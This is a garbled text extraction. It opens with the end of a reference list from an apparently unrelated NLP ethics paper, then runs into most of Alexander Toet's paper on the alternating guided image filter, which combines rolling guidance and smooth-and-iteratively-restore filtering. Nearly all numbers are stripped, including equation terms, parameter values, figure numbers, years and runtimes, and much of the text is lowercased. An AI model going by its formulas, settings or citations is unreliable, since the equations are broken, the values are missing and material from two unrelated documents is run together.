parallel group randomised trials. the bmj, . robert munro. . languages at acl this year. blog post, http://www. junglelightspeed.com/languages- at-acl-this-year/, accessed septem- ber . 
http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://anthology.aclweb.org/p - http://anthology.aclweb.org/p - http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://aclweb.org/anthology/p - http://aclweb.org/anthology/p - http://aclweb.org/anthology/s - http://aclweb.org/anthology/s - https://doi.org/ . / . http://www.aclweb.org/anthology/w/w /w - http://www.aclweb.org/anthology/w/w /w - https://ssrn.com/abstract= https://ssrn.com/abstract= https://doi.org/ . /s - - - https://doi.org/ . /s - - - http://doi.org/ . /bmj.c http://doi.org/ . /bmj.c http://doi.org/ . /bmj.c http://doi.org/ . /bmj.c http://www.junglelightspeed.com/languages-at-acl-this-year/ http://www.junglelightspeed.com/languages-at-acl-this-year/ http://www.junglelightspeed.com/languages-at-acl-this-year/ robert munro and christopher d. manning. . subword variation in text message classifica- tion. in human language technologies: the annual conference of the north ameri- can chapter of the association for computa- tional linguistics, pages – . association for computational linguistics. lisa p. nathan, predrag v. klasnja, and batya friedman. . value scenarios: a technique for envisioning systemic effects of new tech- nologies. in chi’ extended abstracts on human factors in computing systems, pages – . acm. lisa p. nathan, milli lake, nell carden grey, trond nilsen, robert f. utter, elizabeth j. ut- ter, mark ring, zoe kahn, and batya fried- man. . multi-lifespan information system design: investigating a new design approach in rwanda. in proceedings of the iconfer- ence, pages – . acm. trond t. nilsen, nell carden grey, and batya friedman. . public curation of a historic collection: a means for speaking safely in pub- lic. in proceedings of the acm confer- ence on computer supported cooperative work companion, pages – . acm. bo pang, lillian lee, and shivakumar vaithyanathan. . thumbs up? senti- ment classification using machine learning techniques. in proceedings of the conference on empirical methods in nat- ural language processing, pages – . association for computational linguistics. tomáš ptáček, ivan habernal, and jun hong. . sarcasm detection on czech and en- glish twitter. in proceedings of coling , the th international conference on compu- tational linguistics: technical papers, pages – . dublin city university and associa- tion for computational linguistics. ellen riloff, ashequl qadir, prafulla surve, lalin- dra de silva, nathan gilbert, and ruihong huang. . sarcasm as contrast between a positive sentiment and negative situation. in proceedings of the conference on empir- ical methods in natural language processing, pages – . association for computational linguistics. ben shneiderman. . opinion: the dangers of faulty, biased, or malicious algorithms requires independent oversight. proceedings of the na- tional academy of sciences, ( ): – . rob speer. . conceptnet numberbatch . : better, less-stereotyped word vectors. blog post, https://blog.conceptnet. io/ / / /conceptnet- numberbatch- - -better-less- stereotyped-word-vectors/, ac- cessed july . rachael tatman. . gender and dialect bias in youtube’s automatic captions. in proceedings of the first acl workshop on ethics in natu- ral language processing, pages – . associ- ation for computational linguistics. zeerak waseem. . are you a racist or am i seeing things? 
Annotator influence on hate speech detection on Twitter. In Proceedings of the First Workshop on NLP and Computational Social Science. Association for Computational Linguistics.
Zeerak Waseem and Dirk Hovy. Hateful symbols or hateful people? Predictive features for hate speech detection on Twitter. In Proceedings of the NAACL Student Research Workshop. Association for Computational Linguistics.
Ke Yang, Julia Stoyanovich, Abolfazl Asudeh, Bill Howe, H. V. Jagadish, and Gerome Miklau. A nutritional label for rankings. In Proceedings of the International Conference on Management of Data (SIGMOD), New York, NY, USA. ACM.
Jieyu Zhao, Tianlu Wang, Mark Yatskar, Vicente Ordonez, and Kai-Wei Chang. Men also like shopping: Reducing gender bias amplification using corpus-level constraints. In Proceedings of the Conference on Empirical Methods in Natural Language Processing. Association for Computational Linguistics.

Alternating guided image filtering
Alexander Toet, TNO, Soesterberg, The Netherlands
Corresponding author: Alexander Toet (lextoet@gmail.com). Academic editor: Klara Kedem. Published in PeerJ Computer Science; distributed under a Creative Commons Public Domain Dedication (open access).

Abstract. Edge preserving filters aim to simplify the representation of images (e.g., by reducing noise or eliminating irrelevant detail) while preserving their most significant edges. These filters are typically nonlinear and locally smooth the image structure while minimizing both blurring and over-sharpening of visually important edges. Here we present the alternating guided filter (AGF), which achieves edge preserving smoothing by combining two recently introduced filters: the rolling guided filter (RGF) and the smooth and iteratively restore (SIR) filter. We show that the integration of RGF and SIR in an alternating iterative framework results in a new smoothing operator that preserves significant image edges while effectively eliminating small scale details.
The AGF combines the large scale edge and local intensity preserving properties of the RGF with the edge restoring properties of the SIR, while eliminating the drawbacks of both previous methods (i.e., edge curvature smoothing by RGF, and local intensity reduction and restoration of small scale details near large scale edges by SIR). The AGF is simple to implement and efficient, and produces high-quality results. We demonstrate the effectiveness of AGF on a variety of images, and provide a public code to facilitate future studies.

Subjects: Algorithms and Analysis of Algorithms, Computer Vision
Keywords: guided filter, edge preserving filter, bilateral filter, alternating guided filter, rolling guided filter, image enhancement, noise reduction, edge enhancement, image smoothing, image filtering

Introduction
Natural scenes contain meaningful visual elements at different spatial scales. Small elements typically represent texture, small objects, and noise, while large scale structures generally represent object or region boundaries, spatial color transitions, or homogeneous regions. Spatial filtering is a common operation in image processing and computer vision that is typically used to reduce noise, eliminate small spurious details (e.g., texture), and enhance image contrast. In spatial filtering, the value of the filtered image at a given location is a function of the original pixel values in a small neighborhood of the same location. In linear filtering, the value of an output pixel is a linear combination (e.g., a weighted average) of the values of the pixels in the input pixel's neighborhood. When the image intensity varies smoothly over space, nearby pixels are likely to have similar values (i.e., they will be correlated), whereas the noise that corrupts these pixel values will be less correlated than the signal, so that averaging reduces noise while preserving the mean signal value. However, the assumption of smooth variation evidently does not hold near edges. Thus, although linear filtering can effectively reduce image noise and eliminate unwanted details smaller than the filter kernel size, it degrades the articulation of (blurs)
the non-linear bilateral filter (blf) assigns each pixel a weighted mean of its neighbors, with the weights decreasing both with spatial distance and with difference in value (tomasi & manduchi, ). while the blf is quite effective at smoothing small intensity changes while preserving strong edges and has efficient implementations, it also tends to blur across edges at larger spatial scales, thereby limiting its value for application in multiscale image decomposition schemes (farbman et al., ). in addition, the blf has the undesirable property that it can reverse the intensity gradient near sharp edges (the weighted average becomes unstable when a pixel has only few similar pixels in its neighborhood: he, sun & tang, ). in the joint (or cross) bilateral filter (jblf) a second or guidance image serves to steer the edge stopping range filter thus preventing over- or under- blur near edges (petschnigg et al., ). the recently-introduced guided filter (gf: he, sun & tang, ) is a computationally efficient, edge-preserving translation-variant operator based on a local linear model which avoids the drawbacks of bilateral filtering and other previous approaches. when the input image also serves as the guidance image, the gf behaves like the edge preserving blf. however, similar to the blf, the gf also tends to produce halos near significant edges. two recently presented iterative guided filtering frameworks have the ability to perform edge preserving filtering without the introduction of halos. zhang et al. ( ) showed that the application of the jblf in an iterative rolling guided filter (rgf) framework results in size selective filtering of small scale details combined with the recovery of larger scale edges. however, the rgf also has a drawback: it tends to smooth the curvature of large scale edges. kniefacz & kropatsch ( ) recently introduced a similar framework called the smooth and iteratively restore (sir) filter. sir restores large scale edges while preserving their curvature. however, sir also has two drawbacks: it reduces the local image intensity and restores small scale details in the neighborhood of large scale edges. in this paper we propose an alternating guided filter (agf) scheme that integrates the rgf and sir in a single framework, resulting in a new image smoothing operator that preserves significant edges while effectively eliminating small scale details. agf combines the edge preserving properties of both the rgf (i.e., the elimination of small details in combination with local intensity preservation) and the sir (i.e., the articulated restoration of large scale edges) while it does not suffer from their respective drawbacks (the curvature smoothing of large scale edges by rgf and local intensity reduction in combination with the restoration of small scale details near large scale edges by sir). toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the rest of this paper is organized as follows. ‘related work’ briefly discusses some related work on edge preserving filtering and introduces the rgf and sir filter techniques on which the proposed agf scheme is based. ‘alternating guided filter’ presents the proposed alternating guided filter scheme. ‘experimental results’ presents the results of the application of the agf filter to natural and synthetic images, compares the performance of this new framework with the rgf and sir filter schemes, and provides some runtime estimates. 
finally, in ‘conclusions’ the conclusions of this study are presented. related work in this section we briefly review the edge preserving bilateral and joint bilateral filters and show how they are related to the guided filter. we also discuss two recently introduced frameworks that iteratively apply joint bilateral filters to achieve selective guided filtering of small scale details in combination with large scale edge restoration. bilateral filter the bilateral filter is a non-linear filter that computes the output at each pixel as a gaussian weighted average of their spatial and intensity distances. it prevents blurring across edges by assigning larger weights to pixels that are spatially close and have similar intensity values (tomasi & manduchi, ). it uses a combination of (typically gaussian) spatial and a range (intensity) filter kernels that perform a blurring in the spatial domain weighted by the local variation in the intensity domain. it combines a classic low-pass filter with an edge-stopping function that attenuates the filter kernel weights at locations where the intensity difference between pixels is large. bilateral filtering was developed as a fast alternative to the computationally expensive technique of anisotropic diffusion, which uses gradients of the filtering images itself to guide a diffusion process, thus avoiding edge blurring (perona & malik, ). more formally, at a given image location (pixel) i, the filtered output oi is given by: oi= ki ∑ j∈� ijf (‖i−j‖)g(‖ii−ij‖) ( ) where f is the spatial filter kernel (e.g., a gaussian centered at i), g is the range or intensity (edge-stopping) filter kernel (centered at the image value at i), � is the spatial support of the kernel, ki is a normalizing factor (the sum of the f ·g filter weights). the bilateral filter is controlled by only two parameters: the extent of respectively the spatial kernel and the range kernel. intensity edges are preserved since the bilateral filter decreases not only with the spatial distance but also with the intensity distance. though the filter has efficient implementations (paris & durand, ) and effectively reduces noise while preserving edges in many situations, it has the undesirable property that it can reverse the intensity gradient near sharp edges (the weighted average becomes unstable when a pixel has only few similar pixels in its neighborhood (he, sun & tang, )). toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in the joint (or cross) bilateral filter (jblf) the range filter g is applied to a second or guidance image g (petschnigg et al., ): oi= ki ∑ j∈� ij ·f (‖i−j‖)·g(‖gi−gj‖). ( ) the jblf can prevent over- or under- blur near edges by using a related image g to guide the edge stopping behavior of the range filter. that is, the jblf smooths the image i while preserving edges that are also represented in the image g. the jblf is particularly favored when the edges in the image that is to be filtered are unreliable (e.g., due to noise or distortions) and when a companion image with well-defined edges is available (e.g., in the case of flash /no-flash image pairs). guided filter a guided filter (gf: he, sun & tang, ) is a translation-variant filter based on a local linear model. guided image filtering involves an input image i, a guidance image g (which may be identical to the input image), and an output image o. 
the two filtering conditions are (i) that the local filter output is a linear transform of the guidance image g and (ii) as similar as possible to the input image i. the first condition implies that oi=akgi+bk ∀i∈ωk ( ) where ωk is a square window of size ( r+ )×( r+ ). the local linear model ensures that the output image o has an edge only at locations where the guidance image g has one, because ∇o=a∇g. the linear coefficients ak and bk are constant in ωk. they can be estimated by minimizing the squared difference between the output image o and the input image i (the second filtering condition) in the window ωk, i.e., by minimizing the cost function e: e(ak,bk)= ∑ i∈ωk ( (akgi+bk−ii) +εa k ) ( ) where ε is a regularization parameter penalizing large ak. the coefficients ak and bk can directly be solved by linear regression (he, sun & tang, ): ak = |ω| ∑ i∈ωk giii−gkik σ k +ε ( ) bk = ik−akgk ( ) where |ω| is the number of pixels in ωk, ik and gk represent the means of respectively i and g over ωk, and σ k is the variance of i over ωk. since pixel i is contained in several different (overlapping) windows ωk, the value of oi in eq. ( ) depends on the window over which it is calculated. this can be accounted for by averaging over all possible values of oi: oi= |ω| ∑ k|i∈ωk (akgk+bk). ( ) toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. since ∑ k|i∈ωk ak = ∑ k∈ωiak due to the symmetry of the box window eq. ( ) can be written as oi=aigi+bi ( ) where ai = |ω| ∑ k∈ωiak and bi = |ω| ∑ k∈ωibk are the average coefficients of all windows overlapping i. although the linear coefficients (ai,bi) vary spatially, their gradients will be smaller than those of g near strong edges (since they are the output of a mean filter). as a result we have ∇o≈a∇g, meaning that abrupt intensity changes in the guiding image g are still largely preserved in the output image o. equations ( ), ( ), and ( ) define the gf. when the input image also serves as the guidance image, the gf behaves like the edge preserving bilateral filter, with the parameters ε and the window size r having the same effects as respectively the range and the spatial variances of the bilateral filter. equation ( ) can be rewritten as oi= ∑ j wij(g)ij ( ) with the weighting kernel wij depending only on the guidance image g: wij = |ω| ∑ k:(i,j)∈ωk ( + (gi−gk)(gj−gk) σ k +ε ) . ( ) since ∑ jwij(g)= this kernel is already normalized. the gf is a computationally efficient, edge-preserving operator which avoids the gradient reversal artefacts (i.e., over sharpening of edges) of the blf. however, just like the blf, gf has the limitation that it tends to produce halos (unwanted blurring) near large scale edges (he, sun & tang, ). rolling guidance filter zhang et al. ( ) showed that the application of the joint bilateral filter (eq. ( )) in an iterative framework results in effective size selective filtering of small scale details combined with the recovery of larger scale edges. in their rolling guidance filter (rgf) framework the result gt+ of the tth iteration is obtained from the joint bilateral filtering of the input image i using the result gt of the previous iteration step as the guidance image: gt+ i = ki ∑ j∈� ij ·f (‖i−j‖)·g(‖g t i −g t j‖). ( ) in the rgf scheme details smaller than the gaussian kernel of the bilateral filter are initially removed while the edges of the remaining details are restored by iteratively updating the guidance image. 
at the start of the iteration process the term ‖gti −g t j‖ is almost zero, making the range filter g inoperative, so that the joint bilateral filter effectively behaves like a gaussian filter. details removed by this filter cannot be recovered later in the process. after each iteration step the influence of the range filter gradually increases due to its toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table rolling guidance filter (rgf) algorithm (from zhang et al. ( )). input: input image i, σspatial, σrange, n iter output: output image o procedure: : initialize g as a constant image : for t := to n iter do : gt ← jointbilateralfilter(i,gt− ,σspatial,σrange) {input: i; guidance: gt− } : end for : o←gn iter increasing weights. hence, guided by the input image i, the rgf scheme gradually restores the edges that remain after the initial gaussian filtering. note that the initial guidance image g can simply be a constant (e.g., zero) valued image since it updates to the gaussian filtered input image in the first iteration step. the pseudocode for the rgf scheme is presented in table . the rgf scheme is not restricted to the jbf (zhang et al., ). any average-based joint edge aware averaging filter (e.g., the guided filter) can be applied in the rgf framework. in practice the rgf converges rapidly after only a few ( – ) iterations steps. the rgf scheme is simple to implement and can be efficiently computed. although the rgf enables effective and efficient size selective filtering, it has as drawback that the remaining large scale edges are smoothly curved. smooth and iteratively restore filter kniefacz & kropatsch ( ) recently introduced the smooth and iteratively restore (sir) filter. similar to rgf, sir initially removes small scale details (e.g., through gaussian filtering) and uses an edge-aware filter to iteratively restore larger scale edges. whereas rgf iteratively filters the (fixed) input image while iteratively restoring the initially blurred guidance image, sir does the opposite: it gradually restores the initially blurred image using the original input image as (fixed) guidance. thereto, small details are initially removed through blurring with a gaussian kernel: g i = k ∑ j∈� ij ·f (‖i−j‖). ( ) then, the edges of the remaining details are iteratively restored by repeatedly computing an updated image gt+ by joint bilateral filtering of the blurred image gt using the input image i as the guidance image: gt+ i = ki ∑ j∈� gtj ·f (‖i−j‖)·g(‖ii−ij‖). ( ) similar to rgf, sir converges rapidly after only a few ( – ) iterations steps. compared to rgf, sir has the advantage that it produces edges with articulated curvature, since it attempts to restore them as similar as possible to the edges in the original image. in contrast, the curvature of edges produced by rgf is smoothed (less articulated). toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table smooth and iteratively restore with median filtering (sirmed) algorithm (adapted from kniefacz & kropatsch ( )). input: input image i, σspatial, σrange, n iter output: output image o procedure: : initialize g as a gaussian filtered version of the input image i : for t:= to niter do : gt ← jointbilateralfilter(gt− ,i,σspatial,σrange) {input: gt− ; guidance: i} : gt ←medianfilter(gt ) : end for : o←gn iter sir also has two drawbacks (kniefacz & kropatsch, ). 
first, the overall intensity of the result is less than the overall intensity of the original image, since sir restores edges starting from the initially blurred input image. rgf does not have this problem because it operates on the original image itself. second, sir tends to restore small scale details that are close to large scale edges. this is a result of a spill-over effect (blurring) of the large scale edges which enables the jbf (eq. ( )) to restore small scale details guided by the original input image. as will be shown in ‘relative performance of sir and sirmed’ this restoration of small details near larger edges by sir can effectively be suppressed by applying a median filter at the end of each iteration step with a kernel that is smaller than the gaussian kernel of the bilateral spatial filter (e.g., × ). at each iteration step the median filer ‘‘cleans’’ the image by removing small details that are recovered by the bilateral filter. in the rest of this paper, we will refer to this modification of the original sir algorithm as sirmed (smooth and iteratively restore including median filtering). the pseudocode for the sirmed algorithm is presented in table . the pseudocode for the sir algorithm is obtained by omitting step (the median filter). alternating guided filter in this section we propose a new filter scheme that effectively integrates the rgf and sir frameworks in such a way that it retains the desired effects of both earlier schemes (i.e., the elimination of small details and restoration of large scale edges) while eliminating their respective drawbacks (i.e., the smoothing of the curvature of large scale edges by rgf and the loss of local image intensity by sir). each iteration in the agf framework consists of three consecutive steps. first, joint bilateral filtering is applied to the input image i, using the result gt of the previous iteration step as the guidance image (eq. ( )). second, joint bilateral filtering is applied to the result from the first step, using the original image i as the guidance image (eq. ( )). third, a median filter with a small kernel size (e.g., × ) is applied to the result of the second step. the alternating use of the original image and the filtered result as either input or guidance images guarantees that both the overall image intensity (positive effect of the rgf scheme) and the curvature of the large scale edges (positive effect of the sir scheme) are preserved, while the integration of the median filter toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table alternating guided filter (agf) algorithm. input: input image i, σspatial, σrange, niter output: output image o procedure: : initialize g as a constant image : for t:= to n iter do : gt ← jointbilateralfilter(i,gt− ,σspatial,σrange) {input: i; guidance: gt− } : gt ← jointbilateralfilter(gt,i,σspatial,σrange) {input: gt ; guidance: i } : gt ←medianfilter(gt ) : end for : o←gn iter prevents the reintroduction of filtered small scale details near large scale edges (a negative side effect of sir). hence, the agf scheme combines the positive effects of both the rgf (intensity preservation) and sir (edge curvature preservation) while eliminating their negative side effects (edge curvature smoothing by the rgf scheme and contrast reduction plus the reintroduction of small details near larger edges by the sir scheme). the pseudo code for the agf scheme is presented in table . 
experimental results in this section we present the results of some experiments that were performed to study the performance of the proposed agf framework. we tested agf by applying it to a wide range of different natural images (for an overview of all results see the supplemental information with this paper). also, we compare the performance of agf with that of rgf and sirmed. the images used in this study have a width of pixels, and a height that varies between and pixels. we selected a set of test images with widely varying features and statistics, such as landscapes and aerial images, portraits and mosaics, embroidery and patchwork. the full set of test images with the results of the different filter schemes are provided as supplemental information. in this study, color images are processed by applying the different algorithms to each channel in rgb color space independently. this was done to enable straightforward comparison with the results from previous studies (kniefacz & kropatsch, ; zhang et al., ). note that in practical applications, filtering should preferably be performed in the cie-lab color space, so that only perceptually similar colors are averaged and only perceptually significant edges are preserved. as noted before, a bilateral filter (see eq. ( )) is controlled by two parameters: the size of the spatial filter kernel (σspatial) and that of the range filter kernel (σrange). except when stated otherwise, we used the same constant values for the spatial and range kernels in the bilateral filters that are included in all three frameworks investigated in this study (i.e., rgf, sirmed and agf): σspatial= and σrange= . . these values were empirically toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. figure effects of sir and sirmed filtering on image intensity. (a) input image (photo credit: adrian mendoza). (b, c) d image intensity distribution along a horizontal cross section of (a) (yellow line) after the first iterations of respectively sir and sirmed. the lowest curves show the original intensity distribution in (a). (d, e) results after iterations of respectively sir and sirmed. the spatial and range kernels used in the bilateral filters for this example were respectively σspatial = and σrange = . . determined and resulted in an effective performance for all three frameworks on the entire set of selected test images. relative performance of sir and sirmed figures and illustrate the effect of including a median filter with a kernel size of × at the end of each iteration step in the sir framework (see table ). figure shows the original input image (a) with the result of respectively sir (fig. d) and sirmed (fig. e) toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure effects of sir and sirmed filtering on image intensity. (a) input image. (b, c) d image in- tensity distribution along a horizontal cross section of (a) (yellow line) after the first iterations of re- spectively sir and sirmed. the lowest curves show the original intensity distribution in (a). (d, e) re- sults after iterations of respectively sir and sirmed. the spatial and range kernels used in the bilateral filters for this example were respectively σspatial = and σrange = . . after iterations. 
in addition, this figure also shows the d image intensity distribution along a horizontal cross section of the input image (yellow line in fig. a) after each of the first iterations of both sir (fig. c) and sirmed (fig. d). the lowest curves represent the original intensity distribution (fig. a). comparison of figs. d and e shows that sirmed effectively removes small details all over the image, while sir reintroduces small details near large scale edges (notice for instance the light poles all over the stadium, that are restored in fig. d but are nicely removed in fig. e). a comparison of figs. b and c toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure results of rgf, sirmed and agf filtering for the first iteration steps. the spatial and range kernels used in the bilateral filters for this example were respectively σspatial = and σrange = . . left. (photo credit: adrian mendoza). shows that sir indeed restores high frequency details near large edge discontinuities, while sirmed restores these large scale edges without the reintroduction of small scale details. this effect is also clearly demonstrated in fig. , where sir fails to remove the small scale details all around the outlines of the tentacles and the fishes, while sirmed effectively filters small elements all around these larger objects while both preserving their outlines and smoothing their interior. relative performance of rgf, sirmed and agf figure shows the results of rgf, sirmed and agf filtering after the first iteration steps. notice that all three filter schemes iteratively restore large scale image edges proceeding from an initial low resolution version of the input image. in this process rgf gradually smoothes the curvature of the large scale edges, while sirmed smoothes the overall image intensity resulting in a global contrast reduction. in contrast, agf restores the large scale edges without smoothing their curvature and with preservation of local image contrast. figures b– d illustrate these effects by showing d horizontal cross sections. the contrast reducing effect of sir is clearly shown in fig. c as an overall reduction of the height of the large scale peaks. comparison of figs. e and g illustrates that rgf smoothes the curvature of large scale edges while agf preserves edge curvature. figure shows the details that are removed by filtering with respectively rgf (fig. b), sirmed (fig. c) and agf (fig. d) after iterations, together with the original input image (fig. a). these images are obtained by subtracting the original image from the filtered ones and computing the mean of the absolute value across the three color channels. this example illustrates that each of the three filters removes small scale details while preserving the larger scale edges to a certain extent. note that agf removes small image toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison of rgf, sirmed and agf filtering. (a) input image (photo credit: adrian men- doza). (b–d) d image intensity distribution along a horizontal cross section (yellow line in (a)) after successive iterations. (e–g) results after iteration steps. the spatial and range kernels used in the bilat- eral filters for this example were respectively σspatial = and σrange = . . details all over the image support, while the original large scale edges (e.g., the outlines of the temple) remain relatively unaffected. 
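the removed-detail images referred to above (absolute difference between the input and the filtered result, averaged over the colour channels) can be reproduced with a short helper; the normalisation at the end is only for display and is an assumption, since the text merely notes that the difference images were enhanced for visualisation.

```python
import numpy as np

def removed_detail_map(original, filtered):
    # small-scale details removed by a filter: |original - filtered| averaged over r, g, b
    diff = np.abs(np.asarray(original, dtype=np.float64) -
                  np.asarray(filtered, dtype=np.float64))
    detail = diff.mean(axis=-1)
    # simple normalisation for visual display (assumed; any contrast stretch would do)
    return (detail - detail.min()) / (np.ptp(detail) + 1e-12)
```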
in contrast, both rgf and sirmed significantly alter the articulation of the original large scale edges. rgf smoothes the local edge curvature while sirmed affects the local mean image intensity (resulting in local contrast reduction). as a result, large scale image contours (e.g., the outlines of the temple) are clearly visible in figs. b and c, and much less pronounced in fig. d. figure further illustrates the differential performance of all four filters investigated here (agf, rgf, sir, and sirmed) on an artificial image with noise. figure a shows some simple geometric shapes (cross, triangle, square and wheel) with different sizes on a step-edge background with % additional gaussian noise. figures b– e show the results of respectively agf, rgf, sir and sirmed filtering of fig. a after five iteration steps. this example shows that sir restores noise near the edges of larger details and along the vertical step edge in the background, while agf, rgf and sirmed effectively reduce noise all over the image plane. also, rgf (fig. c) smoothes edge curvature, in contrast to agf, sir and sirmed which retain the original edge curvature. this can for instance be seen in fig. c where the sharp edges of the crosses, the corners of the triangles and squares, and the spokes of the wheels are all rounded after filtering. this example also illustrates that both sir (fig. d) and sirmed (fig. e) effectively reduce image contrast due to the toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the elimination of small scale details by rgf, sirmed and agf filtering. absolute difference between input image (a) and the results of respectively rgf (b), sirmed (c) and agf (d) after itera- tions. the images have been enhanced for visual display. the spatial and range kernels used in the bilateral filters for this example were respectively σspatial = and σrange = . . intensity smoothing that is inherent in this method. agf does not introduce any halos. in contrast, rgf produces high intensity halos, and sir and sirmed both produce halos with a large spatial extent (see fig. c near the crosses and wheels). effects of different parameter settings the results of rgf, sirmed and agf for different values of the parameters σs and σr are shown in figs. – . in these figures rows correspond to different amounts of domain filtering (i.e., different values of σs) and columns to different amounts of range filtering (i.e., different values of σr). these figures show that large spatial kernels and large range kernels both result in blurred image representations. large spatial kernels cause averaging over large image areas, while large range kernels cause averaging over a wider range of image values. in rgf (fig. ) the smoothing of large scale edge curvature increases with increasing σs. this effect can for instance clearly be seen in the first column of fig. (for σr = . ) where the curves in the roof of the temple just above the pillars are still visible for σs= , reduced for σs= and removed for σs= . in sirmed (fig. ) the reduction of local image contrast increases with increasing σs. this effect can for instance clearly be seen in the first column of fig. (for σr = . ) where toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison of agf, rgf, sir and sirmed filtering. (a) artificial input image with % gaussian noise added. results of (b) agf, (c) rgf, (d) sir and (e) sirmed filtering after iteration steps. 
the spatial and range kernels used in the bilateral filters for this example were respectively σspatial = and σrange = . . the contrast in the background vegetation around the temple is still visible for σs = , reduced for σs= and almost removed for σs= . figure shows the effects of different parameter settings on the performance of the proposed agf framework. in contrast to rgf, agf preserves large scale edge curvature, as can be seen in the first column of fig. (for σr = . ). notice that the curves in the roof of the temple just above the pillars remain unaffected, even for the largest size of the spatial kernel (σs= ). in contrast to sirmed, agf also preserves local image intensity (contrast). toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the effects of different parameter settings on rgf filtering. results of rgf filtering of the in- put image for different values of the variances of the spatial (σs = , and ) and range (σr = . , . and . ) filters. figure the effects of different parameter settings on sirmed filtering. results of sirmed filtering of the input image for different values of the variances of the spatial (σs = , and ) and range (σr = . , . and . ) filters. runtime evaluation in this study we used a matlab implementation of the rgf written by zhang et al. ( ) that is freely available from the authors (at http://www.cs.cuhk.edu.hk/~leojia/projects/ rollguidance). the jbf, which is part of this code, is also used here to implement both the sir filter (see ‘bilateral filter’) and the agf filter (see ‘alternating guided filter’). we toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.cs.cuhk.edu.hk/~leojia/projects/rollguidance http://www.cs.cuhk.edu.hk/~leojia/projects/rollguidance http://dx.doi.org/ . /peerj-cs. figure the effects of different parameter settings on agf filtering. results of agf filtering of the in- put image for different values of the variances of the spatial (σs = , and ) and range (σr = . , . and . ) filters. made no effort to optimize the code of the algorithms. we conducted a runtime test on a dell latitude laptop with an intel i ghz cpu and gb memory. the algorithms were implemented in matlab a. only a single thread was used without involving any simd instructions. for this test we used a set of natural rgb images (also provided in the supplemental information with this paper). the spatial and range kernels used in the bilateral filters for this test were fixed at respectively σspatial= and σrange= . , and the number of iterations was set to . the mean runtimes for agf, rgf, sir and sirmed were respectively . ± . , . ± . , . ± . and . ± . s. this shows that the mean runtime of agf is about equal to the sum of the runtimes of rgf and sirmed. this result is as expected, since the steps involved in agf are a combination of the steps involved in both rgf and sirmed. conclusions in this paper we presented the new edge-preserving alternating guided filter (agf) smoothing filter that eliminates small scale image details while preserving both the articulation and curvature of large scale edges and local mean image intensity. the agf framework integrates the recently introduced rgf and (a slightly adapted version of) sir filters in an alternating iterative scheme. agf combines the large scale edge and local intensity preserving image smoothing properties of the rgf with the large scale edge restoring properties of the sir. 
however, it does not suffer from the drawbacks of both of its components: the curvature smoothing of large scale edges by rgf and the local intensity reduction and restoration of small scale details near large scale edges by sir. the agf is simple to implement and efficient. application to a wide range of images has shown that agf consistently produces high-quality results. possible applications areas for agf are for toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. instance detail enhancement, denoising, edge extraction, jpeg artifact removal, multi-scale structure decomposition, saliency detection etc. (see e.g., he, sun & tang, ; kniefacz & kropatsch, ; zhang et al., ). additional information and declarations funding this work was supported by the air force office of scientific research, air force material command, usaf, under grant number fa - - - . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: air force office of scientific research, air force material command, usaf: fa - - - . competing interests the author declares there are no competing interests. author contributions • alexander toet conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the raw data has been supplied as supplemental dataset. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references black mj, sapiro g, marimont dh, heeger d. . robust anisotropic diffusion. ieee transactions on image processing ( ): – doi . / . . farbman z, fattal r, lischinski d, szeliski r. . edge-preserving decompositions for multi-scale tone and detail manipulation. acm transactions on graphics ( ): article doi . / . . he k, sun j, tang x. . guided image filtering. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . kniefacz p, kropatsch w. . smooth and iteratively restore: a simple and fast edge-preserving smoothing model. in: hegenbart s, kwitt r, uhl a, eds. proceedings toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /peerj-cs. of the th annual workshop of the austrian association for pattern recognition (oagm ). – . eprint arxiv: . . paris s, durand f. . a fast approximation of the bilateral filter using a signal processing approach. in: leonardis a, bischof h, pinz a, eds. proceedings of the th european conference on computer vision (eccv ), part iv . berlin, heidelberg: springer berlin heidelberg, – . perona p, malik j. . scale-space and edge detection using anisotropic diffusion. ieee transactions on pattern analysis and machine intelligence ( ): 